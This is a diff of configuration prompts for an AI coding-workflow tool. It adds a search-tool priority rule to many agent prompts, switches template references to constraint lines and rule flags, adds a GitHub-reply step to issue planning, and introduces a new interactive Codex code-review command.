||||
**If exceeded**: Split essential vs nice-to-have, move extras to `analysis-appendix.md` (counts toward limit), use executive summary style
|
||||
|
||||
|
||||
@@ -565,6 +565,7 @@ Output: .workflow/session/{session}/.process/context-package.json
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS**:
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- Initialize CodexLens in Phase 0
|
||||
- Execute get_modules_by_depth.sh
|
||||
- Load CLAUDE.md/README.md (unless in memory)
|
||||
|
||||
@@ -10,6 +10,8 @@ You are an intelligent debugging specialist that autonomously diagnoses bugs thr
|
||||
|
||||
## Tool Selection Hierarchy
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
1. **Gemini (Primary)** - Log analysis, hypothesis validation, root cause reasoning
|
||||
2. **Qwen (Fallback)** - Same capabilities as Gemini, use when unavailable
|
||||
3. **Codex (Alternative)** - Fix implementation, code modification
|
||||
@@ -103,7 +105,7 @@ TASK: • Analyze error pattern • Identify potential root causes • Suggest t
|
||||
MODE: analysis
|
||||
CONTEXT: @{affected_files}
|
||||
EXPECTED: Structured hypothesis list with priority ranking
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/01-diagnose-bug-root-cause.txt) | Focus on testable conditions
|
||||
CONSTRAINTS: Focus on testable conditions
|
||||
" --tool gemini --mode analysis --cd {project_root}
|
||||
```
|
||||
|
||||
@@ -211,7 +213,7 @@ EXPECTED:
|
||||
- Evidence summary
|
||||
- Root cause identification (if confirmed)
|
||||
- Next steps (if inconclusive)
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/01-diagnose-bug-root-cause.txt) | Evidence-based reasoning only
|
||||
CONSTRAINTS: Evidence-based reasoning only
|
||||
" --tool gemini --mode analysis
|
||||
```
|
||||
|
||||
@@ -269,7 +271,7 @@ TASK:
|
||||
MODE: write
|
||||
CONTEXT: @{affected_files}
|
||||
EXPECTED: Working fix that addresses root cause
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/development/02-implement-feature.txt) | Minimal changes only
|
||||
CONSTRAINTS: Minimal changes only
|
||||
" --tool codex --mode write --cd {project_root}
|
||||
```
|
||||
|
||||
|
||||
@@ -70,8 +70,8 @@ The agent supports **two execution modes** based on task JSON's `meta.cli_execut
|
||||
CONTEXT: @**/* ./src/modules/auth|code|code:5|dirs:2
|
||||
./src/modules/api|code|code:3|dirs:0
|
||||
EXPECTED: Documentation files in .workflow/docs/my_project/src/modules/
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/documentation/module-documentation.txt) | Mirror source structure
|
||||
" --tool gemini --mode write --cd src/modules
|
||||
CONSTRAINTS: Mirror source structure
|
||||
" --tool gemini --mode write --rule documentation-module --cd src/modules
|
||||
```
|
||||
|
||||
4. **CLI Execution** (Gemini CLI):
|
||||
@@ -216,7 +216,7 @@ Before completion, verify:
|
||||
{
|
||||
"step": "analyze_module_structure",
|
||||
"action": "Deep analysis of module structure and API",
|
||||
"command": "ccw cli -p \"PURPOSE: Document module comprehensively\nTASK: Extract module purpose, architecture, public API, dependencies\nMODE: analysis\nCONTEXT: @**/* System: [system_context]\nEXPECTED: Complete module analysis for documentation\nRULES: $(cat ~/.claude/workflows/cli-templates/prompts/documentation/module-documentation.txt)\" --tool gemini --mode analysis --cd src/auth",
|
||||
"command": "ccw cli -p \"PURPOSE: Document module comprehensively\nTASK: Extract module purpose, architecture, public API, dependencies\nMODE: analysis\nCONTEXT: @**/* System: [system_context]\nEXPECTED: Complete module analysis for documentation\nCONSTRAINTS: Mirror source structure\" --tool gemini --mode analysis --rule documentation-module --cd src/auth",
|
||||
"output_to": "module_analysis",
|
||||
"on_error": "fail"
|
||||
}
|
||||
@@ -311,6 +311,7 @@ Before completing the task, you must verify the following:
|
||||
## Key Reminders
|
||||
|
||||
**ALWAYS**:
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Detect Mode**: Check `meta.cli_execute` to determine execution mode (Agent or CLI).
|
||||
- **Follow `flow_control`**: Execute the `pre_analysis` steps exactly as defined in the task JSON.
|
||||
- **Execute Commands Directly**: All commands are tool-specific and ready to run.
|
||||
|
||||
@@ -16,7 +16,7 @@ color: green
|
||||
- 5-phase task lifecycle (analyze → implement → test → optimize → commit)
|
||||
- Conflict-aware planning (isolate file modifications across issues)
|
||||
- Dependency DAG validation
|
||||
- Auto-bind for single solution, return for selection on multiple
|
||||
- Execute bind command for single solution, return for selection on multiple
|
||||
|
||||
**Key Principle**: Generate tasks conforming to schema with quantified acceptance criteria.
|
||||
|
||||
@@ -111,34 +111,34 @@ Generate multiple candidate solutions when:
|
||||
- Multiple valid implementation approaches exist
|
||||
- Trade-offs between approaches (performance vs simplicity, etc.)
|
||||
|
||||
| Condition | Solutions |
|
||||
|-----------|-----------|
|
||||
| Low complexity, single approach | 1 solution, auto-bind |
|
||||
| Medium complexity, clear path | 1-2 solutions |
|
||||
| High complexity, multiple approaches | 2-3 solutions, user selection |
|
||||
| Condition | Solutions | Binding Action |
|
||||
|-----------|-----------|----------------|
|
||||
| Low complexity, single approach | 1 solution | Execute bind |
|
||||
| Medium complexity, clear path | 1-2 solutions | Execute bind if 1, return if 2+ |
|
||||
| High complexity, multiple approaches | 2-3 solutions | Return for selection |
|
||||
|
||||
**Binding Decision** (based SOLELY on final `solutions.length`):
|
||||
```javascript
|
||||
// After generating all solutions
|
||||
if (solutions.length === 1) {
|
||||
exec(`ccw issue bind ${issueId} ${solutions[0].id}`); // MUST execute
|
||||
} else {
|
||||
return { pending_selection: solutions }; // Return for user choice
|
||||
}
|
||||
```
|
||||
|
||||
**Solution Evaluation** (for each candidate):
|
||||
```javascript
|
||||
{
|
||||
analysis: {
|
||||
risk: "low|medium|high", // Implementation risk
|
||||
impact: "low|medium|high", // Scope of changes
|
||||
complexity: "low|medium|high" // Technical complexity
|
||||
},
|
||||
score: 0.0-1.0 // Overall quality score (higher = recommended)
|
||||
analysis: { risk: "low|medium|high", impact: "low|medium|high", complexity: "low|medium|high" },
|
||||
score: 0.0-1.0 // Higher = recommended
|
||||
}
|
||||
```
|
||||
|
||||
**Selection Flow**:
|
||||
1. Generate all candidate solutions
|
||||
2. Evaluate and score each
|
||||
3. Single solution → auto-bind
|
||||
4. Multiple solutions → return `pending_selection` for user choice
|
||||
|
||||
**Task Decomposition** following schema:
|
||||
```javascript
|
||||
function decomposeTasks(issue, exploration) {
|
||||
return groups.map(group => ({
|
||||
const tasks = groups.map(group => ({
|
||||
id: `T${taskId++}`, // Pattern: ^T[0-9]+$
|
||||
title: group.title,
|
||||
scope: inferScope(group), // Module path
|
||||
@@ -161,7 +161,35 @@ function decomposeTasks(issue, exploration) {
|
||||
},
|
||||
depends_on: inferDependencies(group, tasks),
|
||||
priority: calculatePriority(group) // 1-5 (1=highest)
|
||||
}))
|
||||
}));
|
||||
|
||||
// GitHub Reply Task: Add final task if issue has github_url
|
||||
if (issue.github_url || issue.github_number) {
|
||||
const lastTaskId = tasks[tasks.length - 1]?.id;
|
||||
tasks.push({
|
||||
id: `T${taskId++}`,
|
||||
title: 'Reply to GitHub Issue',
|
||||
scope: 'github',
|
||||
action: 'Notify',
|
||||
description: `Comment on GitHub issue to report completion status`,
|
||||
modification_points: [],
|
||||
implementation: [
|
||||
`Generate completion summary (tasks completed, files changed)`,
|
||||
`Post comment via: gh issue comment ${issue.github_number || extractNumber(issue.github_url)} --body "..."`,
|
||||
`Include: solution approach, key changes, verification results`
|
||||
],
|
||||
test: { unit: [], commands: [] },
|
||||
acceptance: {
|
||||
criteria: ['GitHub comment posted successfully', 'Comment includes completion summary'],
|
||||
verification: ['Check GitHub issue for new comment']
|
||||
},
|
||||
commit: null, // No commit for notification task
|
||||
depends_on: lastTaskId ? [lastTaskId] : [], // Depends on last implementation task
|
||||
priority: 5 // Lowest priority (run last)
|
||||
});
|
||||
}
|
||||
|
||||
return tasks;
|
||||
}
|
||||
```
|
||||
|
||||
@@ -184,14 +212,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
|
||||
**File Format** (JSONL - each line is a complete solution):
|
||||
```
|
||||
{"id":"SOL-GH-123-1","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-2","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-a7x9","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-b2k4","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
```
|
||||
|
||||
**Solution Schema** (must match CLI `Solution` interface):
|
||||
```typescript
|
||||
{
|
||||
id: string; // Format: SOL-{issue-id}-{N}
|
||||
id: string; // Format: SOL-{issue-id}-{uid}
|
||||
description?: string;
|
||||
approach?: string;
|
||||
tasks: SolutionTask[];
|
||||
@@ -204,9 +232,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
**Write Operation**:
|
||||
```javascript
|
||||
// Append solution to JSONL file (one line per solution)
|
||||
const solutionId = `SOL-${issueId}-${seq}`;
|
||||
// Use 4-char random uid to avoid collisions across multiple plan runs
|
||||
const uid = Math.random().toString(36).slice(2, 6); // e.g., "a7x9"
|
||||
const solutionId = `SOL-${issueId}-${uid}`;
|
||||
const solutionLine = JSON.stringify({ id: solutionId, ...solution });
|
||||
|
||||
// Bash equivalent for uid generation:
|
||||
// uid=$(cat /dev/urandom | tr -dc 'a-z0-9' | head -c 4)
|
||||
|
||||
// Read existing, append new line, write back
|
||||
const filePath = `.workflow/issues/solutions/${issueId}.jsonl`;
|
||||
const existing = existsSync(filePath) ? readFileSync(filePath) : '';
|
||||
@@ -215,8 +248,8 @@ Write({ file_path: filePath, content: newContent })
|
||||
```
|
||||
|
||||
**Step 2: Bind decision**
|
||||
- **Single solution** → Auto-bind: `ccw issue bind <issue-id> <solution-id>`
|
||||
- **Multiple solutions** → Return for user selection (no bind)
|
||||
- 1 solution → Execute `ccw issue bind <issue-id> <solution-id>`
|
||||
- 2+ solutions → Return `pending_selection` (no bind)
|
||||
|
||||
---
|
||||
|
||||
@@ -231,14 +264,7 @@ Write({ file_path: filePath, content: newContent })
|
||||
|
||||
Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
|
||||
|
||||
### 2.2 Binding
|
||||
|
||||
| Scenario | Action |
|
||||
|----------|--------|
|
||||
| Single solution | `ccw issue bind <issue-id> <solution-id>` (auto) |
|
||||
| Multiple solutions | Register only, return for selection |
|
||||
|
||||
### 2.3 Return Summary
|
||||
### 2.2 Return Summary
|
||||
|
||||
```json
|
||||
{
|
||||
@@ -275,7 +301,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS**:
|
||||
1. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
|
||||
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
2. Read schema first: `cat .claude/workflows/cli-templates/schemas/solution-schema.json`
|
||||
2. Use ACE semantic search as PRIMARY exploration tool
|
||||
3. Fetch issue details via `ccw issue status <id> --json`
|
||||
4. Quantify acceptance.criteria with testable conditions
|
||||
@@ -283,7 +310,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
6. Evaluate each solution with `analysis` and `score`
|
||||
7. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl` (append mode)
|
||||
8. For HIGH complexity: generate 2-3 candidate solutions
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{N}` (e.g., `SOL-GH-123-1`, `SOL-GH-123-2`)
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{uid}` where uid is 4 random alphanumeric chars (e.g., `SOL-GH-123-a7x9`)
|
||||
10. **GitHub Reply Task**: If issue has `github_url` or `github_number`, add final task to comment on GitHub issue with completion summary
|
||||
|
||||
**CONFLICT AVOIDANCE** (for batch processing of similar issues):
|
||||
1. **File isolation**: Each issue's solution should target distinct files when possible
|
||||
@@ -297,9 +325,9 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
2. Use vague criteria ("works correctly", "good performance")
|
||||
3. Create circular dependencies
|
||||
4. Generate more than 10 tasks per issue
|
||||
5. **Bind when multiple solutions exist** - MUST check `solutions.length === 1` before calling `ccw issue bind`
|
||||
5. Skip bind when `solutions.length === 1` (MUST execute bind command)
|
||||
|
||||
**OUTPUT**:
|
||||
1. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl` (JSONL format)
|
||||
2. Single solution → `ccw issue bind <issue-id> <solution-id>`; Multiple → return only
|
||||
3. Return JSON with `bound`, `pending_selection`
|
||||
1. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl`
|
||||
2. Execute bind or return `pending_selection` based on solution count
|
||||
3. Return JSON: `{ bound: [...], pending_selection: [...] }`
|
||||
|
||||
@@ -87,7 +87,7 @@ TASK: • Detect file conflicts (same file modified by multiple solutions)
|
||||
MODE: analysis
|
||||
CONTEXT: @.workflow/issues/solutions/**/*.jsonl | Solution data: \${SOLUTIONS_JSON}
|
||||
EXPECTED: JSON array of conflicts with type, severity, solutions, recommended_order
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Severity: high (API/data) > medium (file/dependency) > low (architecture)
|
||||
CONSTRAINTS: Severity: high (API/data) > medium (file/dependency) > low (architecture)
|
||||
" --tool gemini --mode analysis --cd .workflow/issues
|
||||
```
|
||||
|
||||
@@ -275,7 +275,8 @@ Return brief summaries; full conflict details in separate files:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS**:
|
||||
1. Build dependency graph before ordering
|
||||
1. **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
2. Build dependency graph before ordering
|
||||
2. Detect file overlaps between solutions
|
||||
3. Apply resolution rules consistently
|
||||
4. Calculate semantic priority for all solutions
|
||||
|
||||
@@ -75,6 +75,8 @@ Examples:
|
||||
|
||||
## Execution Rules
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
1. **Task Tracking**: Create TodoWrite entry for each depth before execution
|
||||
2. **Parallelism**: Max 4 jobs per depth, sequential across depths
|
||||
3. **Strategy Assignment**: Assign strategy based on depth:
|
||||
|
||||
@@ -28,6 +28,8 @@ You are a test context discovery specialist focused on gathering test coverage i
|
||||
|
||||
## Tool Arsenal
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
### 1. Session & Implementation Context
|
||||
**Tools**:
|
||||
- `Read()` - Load session metadata and implementation summaries
|
||||
|
||||
@@ -332,6 +332,7 @@ When generating test results for orchestrator (saved to `.process/test-results.j
|
||||
## Important Reminders
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- **Execute tests first** - Understand what's failing before fixing
|
||||
- **Diagnose thoroughly** - Find root cause, not just symptoms
|
||||
- **Fix minimally** - Change only what's needed to pass tests
|
||||
|
||||
@@ -284,6 +284,8 @@ You execute 6 distinct task types organized into 3 patterns. Each task includes
|
||||
|
||||
### ALWAYS
|
||||
|
||||
**Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
|
||||
**W3C Format Compliance**: ✅ Include $schema in all token files | ✅ Use $type metadata for all tokens | ✅ Use $value wrapper for color (light/dark), duration, easing | ✅ Validate token structure against W3C spec
|
||||
|
||||
**Pattern Recognition**: ✅ Identify pattern from [TASK_TYPE_IDENTIFIER] first | ✅ Apply pattern-specific execution rules | ✅ Follow autonomy level
|
||||
|
||||
@@ -124,6 +124,7 @@ Before completing any task, verify:
|
||||
- Use `run_in_background=false` for all Bash/CLI calls to ensure foreground execution
|
||||
|
||||
**ALWAYS:**
|
||||
- **Search Tool Priority**: ACE (`mcp__ace-tool__search_context`) → CCW (`mcp__ccw-tools__smart_search`) / Built-in (`Grep`, `Glob`, `Read`)
|
||||
- Verify resource/dependency existence before referencing
|
||||
- Execute tasks systematically and incrementally
|
||||
- Test and validate work thoroughly
|
||||
|
||||
361 .claude/commands/cli/codex-review.md Normal file
@@ -0,0 +1,361 @@
|
||||
---
|
||||
name: codex-review
|
||||
description: Interactive code review using Codex CLI via ccw endpoint with configurable review target, model, and custom instructions
|
||||
argument-hint: "[--uncommitted|--base <branch>|--commit <sha>] [--model <model>] [--title <title>] [prompt]"
|
||||
allowed-tools: Bash(*), AskUserQuestion(*), Read(*)
|
||||
---
|
||||
|
||||
# Codex Review Command (/cli:codex-review)
|
||||
|
||||
## Overview
|
||||
Interactive code review command that invokes `codex review` via ccw cli endpoint with guided parameter selection.
|
||||
|
||||
**Codex Review Parameters** (from `codex review --help`):
|
||||
| Parameter | Description |
|
||||
|-----------|-------------|
|
||||
| `[PROMPT]` | Custom review instructions (positional) |
|
||||
| `-c model=<model>` | Override model via config |
|
||||
| `--uncommitted` | Review staged, unstaged, and untracked changes |
|
||||
| `--base <BRANCH>` | Review changes against base branch |
|
||||
| `--commit <SHA>` | Review changes introduced by a commit |
|
||||
| `--title <TITLE>` | Optional commit title for review summary |
|
||||
|
||||
## Prompt Template Format
|
||||
|
||||
Follow the standard ccw cli prompt template:
|
||||
|
||||
```
|
||||
PURPOSE: [what] + [why] + [success criteria] + [constraints/scope]
|
||||
TASK: • [step 1] • [step 2] • [step 3]
|
||||
MODE: review
|
||||
CONTEXT: [review target description] | Memory: [relevant context]
|
||||
EXPECTED: [deliverable format] + [quality criteria]
|
||||
CONSTRAINTS: [focus constraints]
|
||||
```
|
||||
|
||||
## EXECUTION INSTRUCTIONS - START HERE
|
||||
|
||||
**When this command is triggered, follow these exact steps:**
|
||||
|
||||
### Step 1: Parse Arguments
|
||||
|
||||
Check if user provided arguments directly:
|
||||
- `--uncommitted` → Record target = uncommitted
|
||||
- `--base <branch>` → Record target = base, branch name
|
||||
- `--commit <sha>` → Record target = commit, sha value
|
||||
- `--model <model>` → Record model selection
|
||||
- `--title <title>` → Record title
|
||||
- Remaining text → Use as custom focus/prompt
|
||||
|
||||
If no target specified → Continue to Step 2 for interactive selection.
|
||||
|
||||
### Step 2: Interactive Parameter Selection
|
||||
|
||||
**2.1 Review Target Selection**
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "What do you want to review?",
|
||||
header: "Review Target",
|
||||
options: [
|
||||
{ label: "Uncommitted changes (Recommended)", description: "Review staged, unstaged, and untracked changes" },
|
||||
{ label: "Compare to branch", description: "Review changes against a base branch (e.g., main)" },
|
||||
{ label: "Specific commit", description: "Review changes introduced by a specific commit" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**2.2 Branch/Commit Input (if needed)**
|
||||
|
||||
If "Compare to branch" selected:
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which base branch to compare against?",
|
||||
header: "Base Branch",
|
||||
options: [
|
||||
{ label: "main", description: "Compare against main branch" },
|
||||
{ label: "master", description: "Compare against master branch" },
|
||||
{ label: "develop", description: "Compare against develop branch" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
If "Specific commit" selected:
|
||||
- Run `git log --oneline -10` to show recent commits
|
||||
- Ask user to provide commit SHA or select from list
|
||||
|
||||
**2.3 Model Selection (Optional)**
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "Which model to use for review?",
|
||||
header: "Model",
|
||||
options: [
|
||||
{ label: "Default", description: "Use codex default model (gpt-5.2)" },
|
||||
{ label: "o3", description: "OpenAI o3 reasoning model" },
|
||||
{ label: "gpt-4.1", description: "GPT-4.1 model" },
|
||||
{ label: "o4-mini", description: "OpenAI o4-mini (faster)" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
**2.4 Review Focus Selection**
|
||||
|
||||
```javascript
|
||||
AskUserQuestion({
|
||||
questions: [{
|
||||
question: "What should the review focus on?",
|
||||
header: "Focus Area",
|
||||
options: [
|
||||
{ label: "General review (Recommended)", description: "Comprehensive review: correctness, style, bugs, docs" },
|
||||
{ label: "Security focus", description: "Security vulnerabilities, input validation, auth issues" },
|
||||
{ label: "Performance focus", description: "Performance bottlenecks, complexity, resource usage" },
|
||||
{ label: "Code quality", description: "Readability, maintainability, SOLID principles" }
|
||||
],
|
||||
multiSelect: false
|
||||
}]
|
||||
})
|
||||
```
|
||||
|
||||
### Step 3: Build Prompt and Command
|
||||
|
||||
**3.1 Construct Prompt Based on Focus**
|
||||
|
||||
**General Review Prompt:**
|
||||
```
|
||||
PURPOSE: Comprehensive code review to identify issues, improve quality, and ensure best practices; success = actionable feedback with clear priorities
|
||||
TASK: • Review code correctness and logic errors • Check coding standards and consistency • Identify potential bugs and edge cases • Evaluate documentation completeness
|
||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Project conventions from CLAUDE.md
|
||||
EXPECTED: Structured review report with: severity levels (Critical/High/Medium/Low), file:line references, specific improvement suggestions, priority ranking
|
||||
CONSTRAINTS: Focus on actionable feedback
|
||||
```
|
||||
|
||||
**Security Focus Prompt:**
|
||||
```
|
||||
PURPOSE: Security-focused code review to identify vulnerabilities and security risks; success = all security issues documented with remediation
|
||||
TASK: • Scan for injection vulnerabilities (SQL, XSS, command) • Check authentication and authorization logic • Evaluate input validation and sanitization • Identify sensitive data exposure risks
|
||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Security best practices, OWASP Top 10
|
||||
EXPECTED: Security report with: vulnerability classification, CVE references where applicable, remediation code snippets, risk severity matrix
|
||||
CONSTRAINTS: Security-first analysis | Flag all potential vulnerabilities
|
||||
```
|
||||
|
||||
**Performance Focus Prompt:**
|
||||
```
|
||||
PURPOSE: Performance-focused code review to identify bottlenecks and optimization opportunities; success = measurable improvement recommendations
|
||||
TASK: • Analyze algorithmic complexity (Big-O) • Identify memory allocation issues • Check for N+1 queries and blocking operations • Evaluate caching opportunities
|
||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Performance patterns and anti-patterns
|
||||
EXPECTED: Performance report with: complexity analysis, bottleneck identification, optimization suggestions with expected impact, benchmark recommendations
|
||||
CONSTRAINTS: Performance optimization focus
|
||||
```
|
||||
|
||||
**Code Quality Focus Prompt:**
|
||||
```
|
||||
PURPOSE: Code quality review to improve maintainability and readability; success = cleaner, more maintainable code
|
||||
TASK: • Assess SOLID principles adherence • Identify code duplication and abstraction opportunities • Review naming conventions and clarity • Evaluate test coverage implications
|
||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Project coding standards
|
||||
EXPECTED: Quality report with: principle violations, refactoring suggestions, naming improvements, maintainability score
|
||||
CONSTRAINTS: Code quality and maintainability focus
|
||||
```
|
||||
|
||||
**3.2 Build Target Description**
|
||||
|
||||
Based on selection, set `{target_description}`:
|
||||
- Uncommitted: `Reviewing uncommitted changes (staged + unstaged + untracked)`
|
||||
- Base branch: `Reviewing changes against {branch} branch`
|
||||
- Commit: `Reviewing changes introduced by commit {sha}`
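
A small sketch of this mapping (the helper name is illustrative):

```javascript
// Sketch: derive {target_description} from the parsed selection
function buildTargetDescription({ target, branch, sha }) {
  switch (target) {
    case 'base':   return `Reviewing changes against ${branch} branch`;
    case 'commit': return `Reviewing changes introduced by commit ${sha}`;
    default:       return 'Reviewing uncommitted changes (staged + unstaged + untracked)';
  }
}
```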
|
||||
|
||||
### Step 4: Execute via CCW CLI
|
||||
|
||||
Build and execute the ccw cli command:
|
||||
|
||||
```bash
|
||||
# Base structure
|
||||
ccw cli -p "<PROMPT>" --tool codex --mode review [OPTIONS]
|
||||
```
|
||||
|
||||
**Command Construction:**
|
||||
|
||||
```bash
|
||||
# Variables from user selection
|
||||
TARGET_FLAG="" # --uncommitted | --base <branch> | --commit <sha>
|
||||
MODEL_FLAG="" # --model <model> (if not default)
|
||||
TITLE_FLAG="" # --title "<title>" (if provided)
|
||||
|
||||
# Build target flag
|
||||
if [ "$target" = "uncommitted" ]; then
|
||||
TARGET_FLAG="--uncommitted"
|
||||
elif [ "$target" = "base" ]; then
|
||||
TARGET_FLAG="--base $branch"
|
||||
elif [ "$target" = "commit" ]; then
|
||||
TARGET_FLAG="--commit $sha"
|
||||
fi
|
||||
|
||||
# Build model flag (only if not default)
|
||||
if [ "$model" != "default" ] && [ -n "$model" ]; then
|
||||
MODEL_FLAG="--model $model"
|
||||
fi
|
||||
|
||||
# Build title flag (if provided)
|
||||
if [ -n "$title" ]; then
|
||||
TITLE_FLAG="--title \"$title\""
|
||||
fi
|
||||
|
||||
# Execute
|
||||
ccw cli -p "$PROMPT" --tool codex --mode review $TARGET_FLAG $MODEL_FLAG $TITLE_FLAG
|
||||
```
|
||||
|
||||
**Full Example Commands:**
|
||||
|
||||
**Option 1: With custom prompt (reviews uncommitted by default):**
|
||||
```bash
|
||||
ccw cli -p "
|
||||
PURPOSE: Comprehensive code review to identify issues and improve quality; success = actionable feedback with priorities
|
||||
TASK: • Review correctness and logic • Check standards compliance • Identify bugs and edge cases • Evaluate documentation
|
||||
MODE: review
|
||||
CONTEXT: Reviewing uncommitted changes | Memory: Project conventions
|
||||
EXPECTED: Structured report with severity levels, file:line refs, improvement suggestions
|
||||
CONSTRAINTS: Actionable feedback
|
||||
" --tool codex --mode review --rule analysis-review-code-quality
|
||||
```
|
||||
|
||||
**Option 2: Target flag only (no prompt allowed):**
|
||||
```bash
|
||||
ccw cli --tool codex --mode review --uncommitted
|
||||
```
|
||||
|
||||
### Step 5: Execute and Display Results
|
||||
|
||||
```bash
|
||||
Bash({
|
||||
command: "ccw cli -p \"$PROMPT\" --tool codex --mode review $FLAGS",
|
||||
run_in_background: true
|
||||
})
|
||||
```
|
||||
|
||||
Wait for completion and display formatted results.
|
||||
|
||||
## Quick Usage Examples
|
||||
|
||||
### Direct Execution (No Interaction)
|
||||
|
||||
```bash
|
||||
# Review uncommitted changes with default settings
|
||||
/cli:codex-review --uncommitted
|
||||
|
||||
# Review against main branch
|
||||
/cli:codex-review --base main
|
||||
|
||||
# Review specific commit
|
||||
/cli:codex-review --commit abc123
|
||||
|
||||
# Review with custom model
|
||||
/cli:codex-review --uncommitted --model o3
|
||||
|
||||
# Review with security focus
|
||||
/cli:codex-review --uncommitted security
|
||||
|
||||
# Full options
|
||||
/cli:codex-review --base main --model o3 --title "Auth Feature" security
|
||||
```
|
||||
|
||||
### Interactive Mode
|
||||
|
||||
```bash
|
||||
# Start interactive selection (guided flow)
|
||||
/cli:codex-review
|
||||
```
|
||||
|
||||
## Focus Area Mapping
|
||||
|
||||
| User Selection | Prompt Focus | Key Checks |
|
||||
|----------------|--------------|------------|
|
||||
| General review | Comprehensive | Correctness, style, bugs, docs |
|
||||
| Security focus | Security-first | Injection, auth, validation, exposure |
|
||||
| Performance focus | Optimization | Complexity, memory, queries, caching |
|
||||
| Code quality | Maintainability | SOLID, duplication, naming, tests |
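
In practice the focus selection reduces to a lookup that picks one of the four prompt templates from Step 3.1 (a sketch; `PROMPT_TEMPLATES`, `focusAnswer`, and `targetDescription` are assumed names for values produced earlier in the flow):

```javascript
// Sketch: map the user's focus selection to a prompt template key
const FOCUS_TO_TEMPLATE = {
  'General review (Recommended)': 'general',
  'Security focus':               'security',
  'Performance focus':            'performance',
  'Code quality':                 'quality'
};

const templateKey = FOCUS_TO_TEMPLATE[focusAnswer] || 'general';
const PROMPT = PROMPT_TEMPLATES[templateKey]              // templates defined in Step 3.1
  .replace('{target_description}', targetDescription);    // from Step 3.2
```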
|
||||
|
||||
## Error Handling
|
||||
|
||||
### No Changes to Review
|
||||
```
|
||||
No changes found for review target. Suggestions:
|
||||
- For --uncommitted: Make some code changes first
|
||||
- For --base: Ensure branch exists and has diverged
|
||||
- For --commit: Verify commit SHA exists
|
||||
```
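
Before dispatching the CLI, a quick pre-check can catch the empty-diff case early. A sketch, assuming `Bash(...)` returns the command's stdout:

```javascript
// Sketch: verify the selected target actually has changes before calling ccw cli
function hasChanges({ target, branch, sha }) {
  if (target === 'uncommitted') {
    return Bash('git status --porcelain').trim().length > 0;
  }
  if (target === 'base') {
    return Bash(`git diff --name-only ${branch}...HEAD`).trim().length > 0;
  }
  // commit target: a commit always carries its own diff, but verify the SHA exists
  return Bash(`git cat-file -t ${sha} || true`).trim() === 'commit';
}
```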
|
||||
|
||||
### Invalid Branch
|
||||
```bash
|
||||
# Show available branches
|
||||
git branch -a --list | head -20
|
||||
```
|
||||
|
||||
